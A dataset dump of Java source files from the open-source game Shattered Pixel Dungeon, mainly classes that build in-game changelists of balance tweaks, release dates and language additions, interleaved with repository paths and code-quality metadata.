changes.addButton( new ChangeButton(new ItemSprite(new Food()), "Food Buffs",
"_-_ Meat and small rations are 50% more filling\n" +
"_-_ Pasties and blandfruit are 12.5% more filling"));
changes.addButton( new ChangeButton(new ItemSprite(new Greataxe()), "Tier-5 Weapon Buffs",
"_-_ Greataxe base damage increased by ~22%\n" +
"_-_ Greatshield base damage increased by ~17%"));
changes.addButton( new ChangeButton(new ItemSprite(new StoneOfEnchantment()), "Enchant and Glyph Balance Changes",
"_-_ Vampiric enchant lifesteal reduced by 20%\n\n" +
"Lucky enchant rebalanced:\n" +
"_-_ now deals 2x/0x damage, instead of min/max\n" +
"_-_ base chance to deal 2x increased by ~10%\n\n" +
"Glyph of Viscosity rebalanced:\n" +
"_-_ proc chance reduced by ~25% \n" +
"_-_ damage over time reverted from 15% to 10%\n\n" +
"_-_ Glyph of Entanglement root time reduced by 40%\n\n" +
"Glyph of Potential rebalanced:\n" +
"_-_ self-damage no longer scales with max hp\n" +
"_-_ grants more charge at higher levels"));
changes.addButton( new ChangeButton(Icons.get(Icons.PREFS), Messages.get(ChangesScene.class, "misc"),
"_-_ Visiting floor 21 before completing the imp quest no longer prevents his shop from spawning\n\n" +
"_-_ Floor 2 entry doors are now only hidden for new players\n\n" +
"_-_ Falling damage tweaked to be less random\n\n" +
"_-_ Resume indicator now appears in more cases"));
}
}
| 57,190 | v0_6_X_Changes | java | en | java | code | {"qsc_code_num_words": 8114, "qsc_code_num_chars": 57190.0, "qsc_code_mean_word_length": 5.00529948, "qsc_code_frac_words_unique": 0.1911511, "qsc_code_frac_chars_top_2grams": 0.0094551, "qsc_code_frac_chars_top_3grams": 0.04210474, "qsc_code_frac_chars_top_4grams": 0.06869722, "qsc_code_frac_chars_dupe_5grams": 0.29997784, "qsc_code_frac_chars_dupe_6grams": 0.26676187, "qsc_code_frac_chars_dupe_7grams": 0.22438628, "qsc_code_frac_chars_dupe_8grams": 0.19493758, "qsc_code_frac_chars_dupe_9grams": 0.18193682, "qsc_code_frac_chars_dupe_10grams": 0.17787408, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.01285057, "qsc_code_frac_chars_whitespace": 0.17950691, "qsc_code_size_file_byte": 57190.0, "qsc_code_num_lines": 894.0, "qsc_code_num_chars_line_max": 282.0, "qsc_code_num_chars_line_mean": 63.97091723, "qsc_code_frac_chars_alphabet": 0.85265536, "qsc_code_frac_chars_comments": 0.01363875, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.21010638, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.17952128, "qsc_code_frac_chars_string_length": 0.63758199, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.0, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0, "qsc_codejava_cate_var_zero": 0.0, "qsc_codejava_frac_lines_func_ratio": 0.00930851, "qsc_codejava_score_lines_no_logic": 0.0625, "qsc_codejava_frac_words_no_modifier": 0.875, "qsc_codejava_frac_words_legal_var_name": 1.0, "qsc_codejava_frac_words_legal_func_name": 1.0, "qsc_codejava_frac_words_legal_class_name": 0.0, "qsc_codejava_frac_lines_print": 0.0} | 0 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 0, "qsc_code_frac_chars_top_4grams": 0, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 1, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0, "qsc_codejava_cate_var_zero": 0, "qsc_codejava_frac_lines_func_ratio": 0, "qsc_codejava_score_lines_no_logic": 0, "qsc_codejava_frac_lines_print": 0} |
00-Evan/shattered-pixel-dungeon-gdx | core/src/com/shatteredpixel/shatteredpixeldungeon/ui/changelist/ChangesWindow.java | /*
* Pixel Dungeon
* Copyright (C) 2012-2015 Oleg Dolya
*
* Shattered Pixel Dungeon
* Copyright (C) 2014-2019 Evan Debenham
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>
*/
package com.shatteredpixel.shatteredpixeldungeon.ui.changelist;
import com.shatteredpixel.shatteredpixeldungeon.scenes.PixelScene;
import com.shatteredpixel.shatteredpixeldungeon.windows.WndTitledMessage;
import com.watabou.input.NoosaInputProcessor;
import com.watabou.noosa.Image;
import com.watabou.noosa.TouchArea;
public class ChangesWindow extends WndTitledMessage {
public ChangesWindow(Image icon, String title, String message ) {
super( icon, title, message);
TouchArea blocker = new TouchArea( 0, 0, PixelScene.uiCamera.width, PixelScene.uiCamera.height ) {
@Override
protected void onClick( NoosaInputProcessor.Touch touch ) {
hide();
}
};
blocker.camera = PixelScene.uiCamera;
add(blocker);
}
}
| 1,526 | ChangesWindow | java | en | java | code | {"qsc_code_num_words": 197, "qsc_code_num_chars": 1526.0, "qsc_code_mean_word_length": 5.86294416, "qsc_code_frac_words_unique": 0.59390863, "qsc_code_frac_chars_top_2grams": 0.03896104, "qsc_code_frac_chars_top_3grams": 0.03376623, "qsc_code_frac_chars_top_4grams": 0.04935065, "qsc_code_frac_chars_dupe_5grams": 0.07099567, "qsc_code_frac_chars_dupe_6grams": 0.04848485, "qsc_code_frac_chars_dupe_7grams": 0.0, "qsc_code_frac_chars_dupe_8grams": 0.0, "qsc_code_frac_chars_dupe_9grams": 0.0, "qsc_code_frac_chars_dupe_10grams": 0.0, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.01491366, "qsc_code_frac_chars_whitespace": 0.16513761, "qsc_code_size_file_byte": 1526.0, "qsc_code_num_lines": 46.0, "qsc_code_num_chars_line_max": 101.0, "qsc_code_num_chars_line_mean": 33.17391304, "qsc_code_frac_chars_alphabet": 0.89167975, "qsc_code_frac_chars_comments": 0.51114024, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.0, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.0, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.0, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0, "qsc_codejava_cate_var_zero": 0.0, "qsc_codejava_frac_lines_func_ratio": 0.05263158, "qsc_codejava_score_lines_no_logic": 0.36842105, "qsc_codejava_frac_words_no_modifier": 0.5, "qsc_codejava_frac_words_legal_var_name": 1.0, "qsc_codejava_frac_words_legal_func_name": 1.0, "qsc_codejava_frac_words_legal_class_name": 1.0, "qsc_codejava_frac_lines_print": 0.0} | 1 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 0, "qsc_code_frac_chars_top_4grams": 0, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0, "qsc_codejava_cate_var_zero": 0, "qsc_codejava_frac_lines_func_ratio": 0, "qsc_codejava_score_lines_no_logic": 0, "qsc_codejava_frac_lines_print": 0} |
00-Evan/shattered-pixel-dungeon-gdx | core/src/com/shatteredpixel/shatteredpixeldungeon/ui/changelist/v0_5_X_Changes.java | /*
* Pixel Dungeon
* Copyright (C) 2012-2015 Oleg Dolya
*
* Shattered Pixel Dungeon
* Copyright (C) 2014-2019 Evan Debenham
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>
*/
package com.shatteredpixel.shatteredpixeldungeon.ui.changelist;
import com.shatteredpixel.shatteredpixeldungeon.items.Stylus;
import com.shatteredpixel.shatteredpixeldungeon.items.weapon.melee.Quarterstaff;
import com.shatteredpixel.shatteredpixeldungeon.messages.Messages;
import com.shatteredpixel.shatteredpixeldungeon.scenes.ChangesScene;
import com.shatteredpixel.shatteredpixeldungeon.sprites.ItemSprite;
import com.shatteredpixel.shatteredpixeldungeon.ui.Icons;
import com.shatteredpixel.shatteredpixeldungeon.ui.Window;
import java.util.ArrayList;
public class v0_5_X_Changes {
//just the one update this time
public static void addAllChanges( ArrayList<ChangeInfo> changeInfos ){
add_v0_5_0_Changes(changeInfos);
}
public static void add_v0_5_0_Changes( ArrayList<ChangeInfo> changeInfos ){
ChangeInfo changes = new ChangeInfo("v0.5.0", true, "");
changes.hardlight(Window.TITLE_COLOR);
changeInfos.add(changes);
changes.addButton( new ChangeButton(Icons.get(Icons.SHPX), "Developer Commentary",
"_-_ Released February 8th, 2017\n" +
"_-_ 233 days after Shattered v0.4.0\n" +
"_-_ 115 days after Shattered v0.4.3\n" +
"\n" +
"Dev commentary will be added here in the future."));
changes.addButton( new ChangeButton( Icons.get(Icons.DEPTH), "New Dungeon Visual Style!",
"_-_ Walls and some terrain now have depth\n" +
"_-_ Characters & items are raised & cast shadows\n" +
"_-_ Added a visible tile grid in the settings menu"));
changes.addButton( new ChangeButton(new ItemSprite(new Quarterstaff()), "Equipment Balance Changes",
"_-_ Quarterstaff armor bonus increased from 2 to 3\n\n" +
"_-_ Wand of Frost damage against chilled enemies reduced from -7.5% per turn of chill to -10%\n\n" +
"_-_ Wand of Transfusion self-damage reduced from 15% max hp to 10% max hp per zap\n\n" +
"_-_ Dried Rose charges 20% faster and the ghost hero is stronger, especially at low levels"));
changes.addButton( new ChangeButton(new ItemSprite(new Stylus()), "Glyph Balance Changes",
"_-_ Glyph of Entanglement activates less often but grants significantly more herbal armor\n\n" +
"_-_ Glyph of Stone armor bonus reduced from 2+level to 0+level\n\n" +
"_-_ Glyph of Antimagic magical damage resist reduced from 50% of armor to 33% of armor\n\n" +
"_-_ Glyph of Viscosity damage rate increased from 10% of deferred damage to 15%"));
changes.addButton( new ChangeButton(Icons.get(Icons.LANGS), Messages.get(ChangesScene.class, "language"),
"_-_ Added new Language: Esperanto\n" +
"_-_ Added new Language: Indonesian\n"));
}
}
| 3,418 | v0_5_X_Changes | java | en | java | code | {"qsc_code_num_words": 469, "qsc_code_num_chars": 3418.0, "qsc_code_mean_word_length": 5.32835821, "qsc_code_frac_words_unique": 0.46268657, "qsc_code_frac_chars_top_2grams": 0.05442177, "qsc_code_frac_chars_top_3grams": 0.12164866, "qsc_code_frac_chars_top_4grams": 0.1232493, "qsc_code_frac_chars_dupe_5grams": 0.2384954, "qsc_code_frac_chars_dupe_6grams": 0.11284514, "qsc_code_frac_chars_dupe_7grams": 0.09043617, "qsc_code_frac_chars_dupe_8grams": 0.0, "qsc_code_frac_chars_dupe_9grams": 0.0, "qsc_code_frac_chars_dupe_10grams": 0.0, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.02338569, "qsc_code_frac_chars_whitespace": 0.16179052, "qsc_code_size_file_byte": 3418.0, "qsc_code_num_lines": 75.0, "qsc_code_num_chars_line_max": 108.0, "qsc_code_num_chars_line_mean": 45.57333333, "qsc_code_frac_chars_alphabet": 0.84886562, "qsc_code_frac_chars_comments": 0.23727326, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.0, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0952381, "qsc_code_frac_chars_string_length": 0.43344841, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.0, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0, "qsc_codejava_cate_var_zero": 0.0, "qsc_codejava_frac_lines_func_ratio": 0.04761905, "qsc_codejava_score_lines_no_logic": 0.26190476, "qsc_codejava_frac_words_no_modifier": 0.66666667, "qsc_codejava_frac_words_legal_var_name": 1.0, "qsc_codejava_frac_words_legal_func_name": 1.0, "qsc_codejava_frac_words_legal_class_name": 0.0, "qsc_codejava_frac_lines_print": 0.0} | 1 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 0, "qsc_code_frac_chars_top_4grams": 0, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0, "qsc_codejava_cate_var_zero": 0, "qsc_codejava_frac_lines_func_ratio": 0, "qsc_codejava_score_lines_no_logic": 0, "qsc_codejava_frac_lines_print": 0} |
00-Evan/shattered-pixel-dungeon-gdx | core/src/com/shatteredpixel/shatteredpixeldungeon/ui/changelist/v0_4_X_Changes.java | /*
* Pixel Dungeon
* Copyright (C) 2012-2015 Oleg Dolya
*
* Shattered Pixel Dungeon
* Copyright (C) 2014-2019 Evan Debenham
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>
*/
package com.shatteredpixel.shatteredpixeldungeon.ui.changelist;
import com.shatteredpixel.shatteredpixeldungeon.items.Stylus;
import com.shatteredpixel.shatteredpixeldungeon.items.armor.PlateArmor;
import com.shatteredpixel.shatteredpixeldungeon.items.weapon.melee.Glaive;
import com.shatteredpixel.shatteredpixeldungeon.items.weapon.melee.Longsword;
import com.shatteredpixel.shatteredpixeldungeon.items.weapon.melee.RunicBlade;
import com.shatteredpixel.shatteredpixeldungeon.messages.Messages;
import com.shatteredpixel.shatteredpixeldungeon.scenes.ChangesScene;
import com.shatteredpixel.shatteredpixeldungeon.sprites.ItemSprite;
import com.shatteredpixel.shatteredpixeldungeon.sprites.ItemSpriteSheet;
import com.shatteredpixel.shatteredpixeldungeon.ui.Icons;
import com.shatteredpixel.shatteredpixeldungeon.ui.Window;
import java.util.ArrayList;
public class v0_4_X_Changes {
public static void addAllChanges( ArrayList<ChangeInfo> changeInfos ){
ChangeInfo changes = new ChangeInfo( "v0.4.X", true, "");
changes.hardlight( Window.TITLE_COLOR);
changeInfos.add(changes);
add_v0_4_3_Changes(changeInfos);
add_v0_4_2_Changes(changeInfos);
add_v0_4_1_Changes(changeInfos);
add_v0_4_0_Changes(changeInfos);
}
public static void add_v0_4_3_Changes( ArrayList<ChangeInfo> changeInfos ){
ChangeInfo changes = new ChangeInfo("v0.4.3", false, "");
changes.hardlight(Window.TITLE_COLOR);
changeInfos.add(changes);
changes.addButton( new ChangeButton(Icons.get(Icons.SHPX), "Developer Commentary",
"_-_ Released October 16th, 2016\n" +
"_-_ 37 days after Shattered v0.4.2\n" +
"\n" +
"Dev commentary will be added here in the future."));
changes.addButton( new ChangeButton(Icons.get(Icons.PREFS), "Technical Improvements",
"_-_ Added rankings and hall of heroes sync via Google Play Games, for the Google Play version of Shattered.\n\n" +
"_-_ Added Power Saver mode in settings\n" +
"_-_ Download size reduced by ~25%\n" +
"_-_ Game now supports small screen devices\n" +
"_-_ Performance improvements\n" +
"_-_ Improved variety of level visuals"));
changes.addButton( new ChangeButton(new ItemSprite(ItemSpriteSheet.FLAIL, null), "Balance Changes",
"_-_ Flail max damage increased by ~15%\n" +
"_-_ Wand of Frost damage reduction increased from 5% per turn of chill to 7.5%\n" +
"_-_ Ring of Furor speed bonus reduced by ~15% for slow weapons, ~0% for fast weapons\n" +
"_-_ Reduced sacrificial curse bleed by ~33%\n" +
"_-_ Reworked glyph of brimstone, now grants shielding instead of healing\n" +
"_-_ Reworked glyph of stone, now reduces speed in doorways\n" +
"_-_ Thrown potions now trigger traps and plants"));
}
public static void add_v0_4_2_Changes( ArrayList<ChangeInfo> changeInfos ){
ChangeInfo changes = new ChangeInfo("v0.4.2", false, "");
changes.hardlight(Window.TITLE_COLOR);
changeInfos.add(changes);
changes.addButton( new ChangeButton(Icons.get(Icons.SHPX), "Developer Commentary",
"_-_ Released September 9th, 2016\n" +
"_-_ 46 days after Shattered v0.4.1\n" +
"\n" +
"Dev commentary will be added here in the future."));
changes.addButton( new ChangeButton(Icons.get(Icons.PREFS), "Technical Improvements",
"_-_ Many general performance improvements\n" +
"_-_ Game now uses 2 CPU cores, up from 1\n" +
"_-_ Reduced hitching on many devices\n" +
"_-_ Framerate improvements for older devices\n" +
"_-_ Game size reduced by ~10%"));
changes.addButton( new ChangeButton(new ItemSprite(new Glaive()), "Balance Changes",
"_-_ Spear and Glaive damage reduced\n" +
"_-_ Runic blade damage reduced\n" +
"_-_ Grim enchant now procs more often\n" +
"_-_ Glyph of stone adds more weight\n" +
"_-_ Glyph of potential procs less often\n" +
"_-_ Wand of Fireblast less dangerous to caster\n" +
"_-_ Wand of Pris. Light reveal area reduced\n" +
"_-_ Ring of Wealth slightly more effective\n" +
"_-_ Ring of Sharpshooting gives more accuracy"));
}
public static void add_v0_4_1_Changes( ArrayList<ChangeInfo> changeInfos ){
ChangeInfo changes = new ChangeInfo("v0.4.1", false, "");
changes.hardlight(Window.TITLE_COLOR);
changeInfos.add(changes);
changes.addButton( new ChangeButton(Icons.get(Icons.SHPX), "Developer Commentary",
"_-_ Released July 25th, 2016\n" +
"_-_ 35 days after Shattered v0.4.0\n" +
"\n" +
"Dev commentary will be added here in the future."));
changes.addButton( new ChangeButton(new ItemSprite(new PlateArmor()), "Item Changes pt.1",
"Armor and Enemy Balance Changes:\n" +
"_-_ Armor now has a min damage block value\n" +
"_-_ Armor gains more blocking from upgrades\n" +
"_-_ Prison+ enemy damage increased\n" +
"_-_ Evil Eyes reworked\n" +
"_-_ Brimstone glyph healing reduced\n" +
"\n" +
"Class Balance Changes:\n" +
"_-_ Mage's Staff melee damage increased\n" +
"_-_ Mage's Staff can now preserve one upgrade\n" +
"_-_ Cloak of Shadows buffed at lower levels\n" +
"_-_ Some Battlemage effects changed\n" +
"\n" +
"Wand Balance Changes:\n" +
"_-_ All wands damage adjusted/increased\n" +
"_-_ Upgraded wands appear slightly less often\n" +
"_-_ Wand of Lightning bonus damage reduced\n" +
"_-_ Wand of Fireblast uses fewer charges\n" +
"_-_ Wand of Venom damage increases over time\n" +
"_-_ Wand of Prismatic Light bonus damage reduced\n" +
"_-_ Corrupted enemies live longer & no longer attack eachother\n" +
"_-_ Wands in the holster now charge faster"));
changes.addButton( new ChangeButton(new ItemSprite(new RunicBlade()), "Item Changes pt.2",
"Ring Balance Changes:\n" +
"_-_ Ring of Force weaker at 18+ strength, stronger otherwise\n" +
"_-_ Ring of Tenacity reduces more damage\n" +
"_-_ Ring of Wealth secret rewards adjusted\n" +
"_-_ Ring of Evasion now works consistently\n" +
"\n" +
"Artifact Balance Changes:\n" +
"_-_ Dried Rose charges faster, ghost HP up\n" +
"_-_ Horn of Plenty now charges on exp gain\n" +
"_-_ Master Thieves Armband levels faster\n" +
"_-_ Sandals of Nature level faster\n" +
"_-_ Hourglass uses fewer charges at a time\n" +
"_-_ Horn of Plenty adjusted, now stronger\n" +
"\n" +
"Weapon Balance Changes:\n" +
"_-_ Lucky enchant deals max dmg more often\n" +
"_-_ Dazzling enchant now cripples & blinds\n"+
"_-_ Flail now can't surprise attack, damage increased\n" +
"_-_ Extra reach weapons no longer penetrate\n" +
"_-_ Runic blade damage decreased"));
changes.addButton( new ChangeButton(Icons.get(Icons.PREFS), Messages.get(ChangesScene.class, "misc"),
"_-_ Added a new journal button with key display\n" +
"_-_ Keys now exist in the journal, not inventory\n" +
"_-_ Improved donator menu button visuals\n" +
"_-_ Increased the efficiency of data storage\n" +
"_-_ Chasms now deal less damage, but bleed\n" +
"_-_ Many shop prices adjusted\n" +
"_-_ Pirahna rooms no longer give cursed gear"));
}
public static void add_v0_4_0_Changes( ArrayList<ChangeInfo> changeInfos ){
ChangeInfo changes = new ChangeInfo("v0.4.0", false, "");
changes.hardlight(Window.TITLE_COLOR);
changeInfos.add(changes);
changes.addButton( new ChangeButton(Icons.get(Icons.SHPX), "Developer Commentary",
"_-_ Released June 20th, 2016\n" +
"_-_ 391 days after Shattered v0.3.0\n" +
"_-_ 50 days after Shattered v0.3.5\n" +
"\n" +
"Dev commentary will be added here in the future."));
changes.addButton( new ChangeButton(new ItemSprite(new Longsword()), "Equipment Overhaul!",
"_-_ 13 new weapons, 12 rebalanced weapons\n" +
"\n" +
"Equipment Balance:\n" +
"_-_ Tier 2-4 weapons do more base damage\n" +
"_-_ All weapons gain more dmg from upgrades\n" +
"_-_ Upgrades now remove enchants less often\n" +
"_-_ Upgrades reduce str requirements less\n" +
"_-_ All armors require 1 more str\n" +
"_-_ Encumbered characters can't sneak attack\n" +
"\n" +
"Droprate Changes:\n" +
"_-_ Powerful equipment less common early\n" +
"_-_ +3 and +2 equipment less common\n" +
"_-_ Equipment curses more common\n" +
"_-_ Tier 1 equipment no longer drops\n" +
"_-_ Arcane styli slightly more common\n" +
"_-_ Better item drops on floors 22-24"));
changes.addButton( new ChangeButton(new ItemSprite(new Stylus()), "Curse, Enchant, & Glyph Overhaul!",
"_-_ 3 new enchants, 10 rebalanced enchants\n" +
"_-_ 8 new glyphs, 5 rebalanced glyphs\n" +
"_-_ 12 new curse effects\n" +
"\n" +
"Equipment Curses:\n" +
"_-_ Curses now give negative effects\n" +
"_-_ Curses no longer give negative levels\n" +
"_-_ Upgrades now weaken curses\n" +
"_-_ Remove curse scrolls now affect 1 item"));
changes.addButton( new ChangeButton(Icons.get(Icons.PREFS), Messages.get(ChangesScene.class, "misc"),
"Class Balance:\n" +
"_-_ Huntress now starts with knuckleduster\n" +
"_-_ Assassin sneak bonus damage reduced\n" +
"_-_ Fixed a bug where berserker was immune when enraged\n" +
"_-_ Gladiator's clobber now inflicts vertigo, not stun\n" +
"\n" +
"Enemy Balance:\n" +
"_-_ Tengu damage increased\n" +
"_-_ Prison Guard health and DR increased\n" +
"\n" +
"Misc:\n" +
"_-_ Scrolls of upgrade no longer burn\n" +
"_-_ Potions of strength no longer freeze\n" +
"_-_ Translation updates\n" +
"_-_ Various bugfixes"));
}
}
| 10,386 | v0_4_X_Changes | java | en | java | code | {"qsc_code_num_words": 1357, "qsc_code_num_chars": 10386.0, "qsc_code_mean_word_length": 5.14959469, "qsc_code_frac_words_unique": 0.32056006, "qsc_code_frac_chars_top_2grams": 0.00729823, "qsc_code_frac_chars_top_3grams": 0.03806525, "qsc_code_frac_chars_top_4grams": 0.06210647, "qsc_code_frac_chars_dupe_5grams": 0.36419576, "qsc_code_frac_chars_dupe_6grams": 0.28577562, "qsc_code_frac_chars_dupe_7grams": 0.25887235, "qsc_code_frac_chars_dupe_8grams": 0.21293646, "qsc_code_frac_chars_dupe_9grams": 0.20535203, "qsc_code_frac_chars_dupe_10grams": 0.19633658, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.0175981, "qsc_code_frac_chars_whitespace": 0.19025611, "qsc_code_size_file_byte": 10386.0, "qsc_code_num_lines": 237.0, "qsc_code_num_chars_line_max": 120.0, "qsc_code_num_chars_line_mean": 43.82278481, "qsc_code_frac_chars_alphabet": 0.81331748, "qsc_code_frac_chars_comments": 0.0751011, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.18229167, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.015625, "qsc_code_frac_chars_string_length": 0.5453883, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.0, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0, "qsc_codejava_cate_var_zero": 0.0, "qsc_codejava_frac_lines_func_ratio": 0.02604167, "qsc_codejava_score_lines_no_logic": 0.09375, "qsc_codejava_frac_words_no_modifier": 0.83333333, "qsc_codejava_frac_words_legal_var_name": 1.0, "qsc_codejava_frac_words_legal_func_name": 1.0, "qsc_codejava_frac_words_legal_class_name": 0.0, "qsc_codejava_frac_lines_print": 0.0} | 1 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 0, "qsc_code_frac_chars_top_4grams": 0, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0, "qsc_codejava_cate_var_zero": 0, "qsc_codejava_frac_lines_func_ratio": 0, "qsc_codejava_score_lines_no_logic": 0, "qsc_codejava_frac_lines_print": 0} |
00-Evan/shattered-pixel-dungeon-gdx | core/src/com/shatteredpixel/shatteredpixeldungeon/ui/changelist/v0_7_X_Changes.java | /*
* Pixel Dungeon
* Copyright (C) 2012-2015 Oleg Dolya
*
* Shattered Pixel Dungeon
* Copyright (C) 2014-2019 Evan Debenham
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
